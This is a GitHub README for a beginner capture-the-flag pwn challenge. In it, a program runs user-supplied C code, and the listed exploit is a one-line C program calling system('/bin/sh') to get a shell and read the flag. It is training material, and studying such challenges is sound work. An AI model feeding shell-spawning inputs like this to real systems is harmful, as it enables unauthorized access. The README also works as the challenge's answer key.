Skip to content
This repository has been archived by the owner on May 24, 2023. It is now read-only.

KosenXmasCTF/beginners_shell

Repository files navigation

beginners_shell

Genre: Pwn Difficulty: Beginner Author: iwancof

C言語を勉強中の「彼」はみんなが教えてくれたプログラムを実行するのが好きみたい!でも彼には秘密があって...。どうにかして秘密の flag を聞き出せないかな?

Files

  • main.c
  • Makefile

Run

$ make
$ ./beginners_shell

exploit

$ ./beginners_shell
int main() {system("/bin/sh");}

writeup

やるだけ

Comment

pwn初心者向け このジャンルの問題で、何をすればゴールなのかを提示するみたいな感じ。